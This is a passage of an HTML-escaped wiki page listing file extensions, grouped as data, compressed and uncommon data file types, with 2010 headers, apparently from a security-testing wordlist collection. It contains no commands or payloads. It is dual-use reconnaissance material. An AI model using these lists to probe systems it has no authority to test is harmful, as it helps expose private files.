.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
